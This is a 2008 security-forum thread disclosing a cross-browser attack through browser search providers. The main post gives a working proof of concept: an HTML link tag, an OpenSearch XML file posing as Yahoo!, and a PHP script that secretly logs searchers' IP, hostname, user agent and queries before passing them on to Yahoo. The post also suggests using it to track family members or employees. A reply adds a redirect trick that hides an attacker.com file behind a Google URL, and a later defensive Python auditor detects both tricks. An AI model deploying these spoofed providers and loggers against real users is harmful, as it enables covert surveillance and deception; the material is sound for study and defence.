Sla.ckers.org
Cross-Browser "Search Provider" Man In The Middle Attack
Date: January 26, 2008 04:27AM

NOTE: This is something I came up with last week while attempting to try and find a new form of enumeration for browser plugins. I figured I would post it here in the event anyone else was interested. I've tried to format it the best way possible using uBB code, but in the event any of the code becomes formatted I have it all available on my own website. Below is the exact copy of the page, but with uBB formatting instead.
The reason I have used so many screenshots is to provide readers with a more clear idea of how it all comes together rather than trying to explain it using only words. I have tried to be as in depth as possible regarding the issue, how it works, and a few other things. I also tried to see if it was possible to cause a buffer overflow by creating an overly large search provider name, but with 4 million characters it simply wrapped the text on the context menu.

The Article:
A more appropriate title for this article, which is slightly clever yet done with a beaten-to-death style would be "All your search are belong to us". Both Microsoft Internet Explorer 7, and Mozilla Firefox are inherently vulnerable to having users' searches intercepted in an odd "Man In The Middle" style scenario slightly similar in nature to the way "Cross-Site Authentication" is performed. Originally setting out to attempt and create a new form of enumeration this vulnerability was a result of both reading an MSDN article on the "window.external" object regarding its limitations, and how "OpenSearch" XML technology can be used in order to create personalized browser search plugins. Being that Microsoft has only recently added a more useful integrated search toolbar into their Internet Explorer browser (as of 7.0) this was to be the target of the original experimentation until it was realized that Mozilla Firefox also had such capabilities, which is where Microsoft must have apparently borrowed the idea from.
More and more search engines are featuring "Search Providers", which can be both temporarily or permanently enabled on the browser client in order to allow individuals to make use of web services without having to necessarily navigate to the actual website. By default Mozilla Firefox includes Google as its specified search engine, and for Microsoft Internet Explorer it is Windows Live Search (formerly MSN). There are slight differences between the two browsers in regard to how this feature functions however both of them are vulnerable at the very least in the fact that it's possible for search terms and queries entered by users to be intercepted, and logged on third-party domains.

Microsoft Internet Explorer 7

The "OpenSearch" toolbar is located in the upper-right hand corner of Microsoft Internet Explorer 7, and normally resembles that of the above image. When text is entered within this field, and either the magnifying glass icon is clicked or the user enters a carriage return, the browser automatically uses the chosen search engine to initiate a query. Microsoft Internet Explorer supports up to 200 total search providers, and to switch between each service a user simply uses a mousedown action on the "down arrow" icon to cause Internet Explorer to create a context menu which lists each search engine that is available (both ones that are temporarily embedded through the use of HTML or ones physically added to the Windows registry). This appears similar to the following image:

As mentioned in the above statement only a single line of HTML (along with a valid OpenSearch XML document) is required to temporarily add a search provider service to Microsoft Internet Explorer 7. When the browser detects the element in the page's source it causes the toolbar to visibly change by altering the color of the drop-down menu icon from its normal gray gradient to one with an orange tone. Temporary search providers only apply to the window or tab that the HTML source is located on, which means if a user is running multiple tabs, and switches between them that the provider will only be available and appear on the window when the page containing the HTML has been given focus. This looks similar to the figure found below:

In the event a new search provider is indeed present the chosen name stemming from the "title" attribute in the HTML LINK entity (not an HREF link) will appear in the list with a star icon adjacent to it. An example of this being demonstrated can be found in the depiction below, which was caused while navigating from a random website to the Alexa search engine.

If a user chooses to add the search provider permanently to the Microsoft Internet Explorer 7 web browser by choosing "Add Search Providers" from the menu (assuming one is detected), or if a client-side script tries to force this action using the "window.external.AddSearchProvider" function then a prompt will appear similar to that of the next image requiring the user to verify the validity of the search provider before allowing it to be added to the browser permanently via the Windows registry.

Again in the previous figure the name of the search engine which appears in the prompt can arbitrarily be spoofed, or falsified, but must be done so in the physical XML file containing the necessary search provider information. This is due to the fact that when a search provider service is to be added indefinitely by the user Internet Explorer requests the XML file containing the "OpenSearch" data, and parses it to allow the individual to authenticate the search engine prior to having it become allowed for use perpetually. To demonstrate this fact a small snippet of HTML code is embedded within the test document. The following snippet was used to create the next graphical representation:

<link rel="search" title="AnDrEw's Fake Search Engine" type="application/opensearchdescription+xml" href="http://www.thirdpartywebsite.com/search.xml">
The single line of HTML code displayed above takes care of temporarily adding a search provider to the Internet Explorer search field, and due to the simplistic nature of both the OpenSearch XML format, and the flexibility of the feature provided by the browser one can easily create a phony web search tool posing as a more popular or well-known service. An excellent example of this is a fraudulent "Yahoo!" search provider entry added to the search area created with a slight modification to the above HTML source.


Again as a safety precaution to prevent such abuse from taking place Internet Explorer once more spawns a prompt when the counterfeit search provider is going to be set as a permanent plugin. At first glance it appears with "www.awesomeandrew.net" (regardless of the fact that the XML file was actually found several directories from the root one), which is a good indicator that it is not the official Yahoo! search engine service. Again an attempt was made to circumvent this safeguard by instead creating a large subdomain like those made popular by MySpace phishing schemes, or similar to the "Proof of Concept" created by several individuals for Cross-Site Authentication.

Upon once again modifying the location of the XML file and refreshing, the new URL where the search service apparently originates is "...rch.yahoo.com.search.p.query.toggled.4", which proved that Microsoft Internet Explorer's prompt would truncate erroneously long addresses. While security-minded individuals would more than likely see it and immediately flag it as suspicious, most computer users would simply accept it without giving it a second look (again MySpace phishing URLs serve as the perfect example). Before moving on to the practical exploitation example one should also look at how Mozilla Firefox handles the situation.

Mozilla Firefox

Like Microsoft's Internet Explorer, Mozilla Firefox's search bar is also found at the top-right of the browser, but features a few additional elements its competition lacks. Obviously one of the most visible differences between Firefox's search input and that of Internet Explorer's is the fact that favicon images appear to the left of each search provider listed as an available addon. By depressing the mouse on the arrow next to the search service's icon a list of any pre-installed or pre-existing search engine services appears, again with a respective favicon to its left.

When a new search service is detected in Mozilla Firefox it is a lot less noticeable, but the button surrounding the selected provider's icon is highlighted.

When the user checks the list to see what has been offered both the name and the 16 by 16 pixel favicon image from the search provider's respective website appears.

Should the user choose to add the service directly through the menu there is no prompt, warning, or other type of dialog pointing out the actual URL to the location of the XML file like there was on Internet Explorer. This is shown in the figure found below.

Hoping perhaps there was some type of preference setting, which actually output the URL to the search provider the "Manage Search Engines..." option was chosen from the menu. After opening this window however it was very clear that there was no indication that the address of the search plugin could be lying on any malicious or nefarious third-party website.

Since Firefox seems to have its own unique support of the search option why not take advantage of it? A new temporary search provider was created to demonstrate that both the title and image of an entry could be forged easily by any individual in an attempt to deliberately deceive potential victims into trusting the service as a legitimate feature.


The only point at which Firefox even attempts to make an effort at notifying its users that a search engine provider may not be as it seems is when a client-side script is used to try and add a search service through the "window.external" object. This is shown in the above picture, which also establishes that Firefox does not prune the actual URL pointing to the XML file's location, or have it wrap in such a manner that it would be possible to beguile gullible individuals into intentionally augmenting their search provider feature with deceitful services.

Cross-Browser Search Provider Exploitation
Now that the finer points of the customizable search engine field on each browser have been discussed it is time for a "Proof of Concept" example highlighting how a "Man In The Middle" attack can be performed through the simple exploitation and abuse of such legitimate features along with the naivety of the browsers' users.

Temporary Search Provider HTML
<link rel="search" title="Yahoo!" type="application/opensearchdescription+xml" href="http://www.thirdpartywebsite.com/search.xml">

OpenSearch 1.1 XML Document/Search Provider File
<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
     <ShortName>Yahoo!</ShortName>
     <LongName>Yahoo! Web Search</LongName>
     <Description>Use Yahoo! Web Search Directly From Your Browser!</Description>
     <InputEncoding>utf-8</InputEncoding>
     <Image width="16" height="16">http://www.yahoo.com/favicon.ico</Image>
     <Url type="text/html" template="http://www.thirdpartywebsite.com/logger.php?search={searchTerms}"/>
     <moz:Url type="text/html" method="GET" template="http://www.thirdpartywebsite.com/logger.php?search={searchTerms}"/>
     <moz:UpdateInterval>7</moz:UpdateInterval>
     <moz:UpdateUrl>http://www.thirdpartywebsite.com/search.xml</moz:UpdateUrl>
     <moz:IconUpdateUrl>http://www.yahoo.com/favicon.ico</moz:IconUpdateUrl>
     <moz:SearchForm>http://www.thirdpartywebsite.com/</moz:SearchForm>
     <Tags>yahoo internet web search</Tags>
</OpenSearchDescription>

PHP Search Term Interceptor/Logging Script
<?php
// Browser search providers send no Referer header, so a request carrying one did not come from the search box.
if (!isset($_SERVER["HTTP_REFERER"])) {
    if (isset($_REQUEST["search"])) {
        $RawSearch = $_REQUEST["search"];
        // HTML-encode everything written to the log so it cannot inject script into the log page.
        $Searched = htmlentities($_REQUEST["search"], ENT_QUOTES);
        $LogfileDatabase = fopen("userssearches.html", "a+");
        $UserData = "Date: " . date("l\, F dS Y") . "<br>\n";
        $UserData .= "Time: " . date("h:i:s A") . "<br>\n";
        $UserData .= "IP Address: " . $_SERVER["REMOTE_ADDR"] . "<br>\n";
        $UserData .= "Hostname: " . htmlentities(gethostbyaddr($_SERVER["REMOTE_ADDR"]), ENT_QUOTES) . "<br>\n";
        $UserData .= "User-Agent: " . htmlentities($_SERVER["HTTP_USER_AGENT"], ENT_QUOTES) . "<br>\n";
        $UserData .= "Search Query: " . $Searched . "<br>\n<br>\n";
        fwrite($LogfileDatabase, $UserData);
        fclose($LogfileDatabase);
        // Hand the unaltered query to the real search engine so the user sees normal results.
        header("Location: http://search.yahoo.com/search?p=" . $RawSearch);
        exit;
    } else {
        header("Location: http://www.yahoo.com/");
        exit;
    }
} else {
    header("Location: http://www.yahoo.com/");
    exit;
}
?>
The "Proof of Concept" being used in this example is a fraudulent Yahoo! search provider service, which first logs user-input and other miscellaneous data before forwarding the individual to the actual search query results that are actually provided by Yahoo!. The PHP script first checks to verify that there is no HTTP referrer (or the "Referer" header) in place, because the search providers inside of the browsers do not forward any with the actual request, and then proceeds to make sure a query has been specified. If neither of the conditions are met then the client is forwarded to Yahoo!'s official website. Otherwise an HTML file is opened and written to logging the date, time, the I.P. address of the user who made the search, the individual's hostname, their User-Agent, and the search terms used in the query (all of which have been sanitized to prevent any type of Cross-Site Scripting in the logs). Once the file has completed recording each piece of data relating to the victim in question the unaltered search query is then forwarded to Yahoo!, which presents the individual with the information they were looking for without necessarily having brought to their attention that any malicious activity has taken place.
This "Man In The Middle" scheme could prove quite useful for SEO purposes, tracking users (or family members who use the same computer, corporate employees, et cetera), or in an attempt to create a website similar to "AOL Stalker" (hxxp://www.aolstalker.com). It also coincides nicely with Microsoft's recent decision to force users to upgrade to Internet Explorer 7, and the European Union's recent push to make I.P. addresses "Personally Identifiable Information".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Cross-Browser "Search Provider" Man In The Middle Attack
Posted by: gerry
Date: January 27, 2008 02:10PM

Another thing to note is that in Firefox (maybe others), you can use redirects to spoof the domain when calling AddSearchProvider(). For example, if you host a search provider named "Google " at attacker.com/google.xml. Installing it via:

window.external.AddSearchProvider('http://www.google.com/searchhistory/url?url=http://www.attacker.com/google.xml');

Will display the origin as google.com not attacker.com.

-g
[hiredhacker.com]
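As an added example (not code from either poster), here is a defender-side auditor for the two tricks this thread describes: the OpenSearch description from the first post, whose Yahoo! name and favicon are paired with a {searchTerms} template on a third-party host, and gerry's install URL that hides the real XML location behind a redirect parameter. The sample description is constructed in the shape of the PoC file; the "registrable domain" helper is a last-two-labels simplification with no public-suffix list.

```python
# Added example (not the original post's code): audit an OpenSearch description,
# flagging branding borrowed from one domain while queries go to another, and an
# install URL that hides the real file location behind a redirect parameter.
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

NS = {"os": "http://a9.com/-/spec/opensearch/1.1/",
      "moz": "http://www.mozilla.org/2006/browser/search/"}

def sample_xml(template, icon="http://www.yahoo.com/favicon.ico"):
    """Constructed description in the shape of the thread's PoC file."""
    return (f'<OpenSearchDescription xmlns="{NS["os"]}" xmlns:moz="{NS["moz"]}">'
            f"<ShortName>Yahoo!</ShortName>"
            f'<Image width="16" height="16">{icon}</Image>'
            f'<Url type="text/html" template="{template}"/>'
            f'<moz:Url type="text/html" method="GET" template="{template}"/>'
            f"</OpenSearchDescription>")

def site(url):
    """Crude registrable domain (last two labels); no public-suffix list here."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])

def audit_description(xml_text):
    """Sorted, de-duplicated findings for one OpenSearch 1.1 document."""
    root = ET.fromstring(xml_text)
    name = root.findtext("os:ShortName", "", NS).lower()
    icon = root.findtext("os:Image", "", NS)
    templates = [u.get("template", "") for u in
                 root.findall("os:Url", NS) + root.findall("moz:Url", NS)]
    findings = set()
    for tpl in templates:
        if "{searchterms}" not in tpl.lower():
            continue  # not a query endpoint (e.g. a suggestion or form URL)
        if icon and site(icon) != site(tpl):
            findings.add(f"icon from {site(icon)} but queries go to {site(tpl)}")
        brand = site(icon).split(".")[0]
        if brand and brand in name and brand not in site(tpl):
            findings.add(f"name '{name}' claims {brand} but template host is {site(tpl)}")
    return sorted(findings)

def embedded_target(install_url):
    """Host of a URL carried in a query parameter, if it differs from the outer host."""
    outer = site(install_url)
    for values in parse_qs(urlsplit(install_url).query).values():
        for v in values:
            if v.startswith(("http://", "https://")) and site(v) != outer:
                return site(v)
    return None
```

The second check only sees URLs that sit whole in one query value; an embedded URL with its own unescaped "&" parameters would be split by parse_qs.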

Re: Cross-Browser "Search Provider" Man In The Middle Attack
Date: January 27, 2008 06:44PM

Thanks Gerry! The thought of using an open redirect to spoof the location of the source to the XML file never even crossed my mind. I'm going to continue playing with the window.external object to see if I can come up with any other interesting concepts.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/
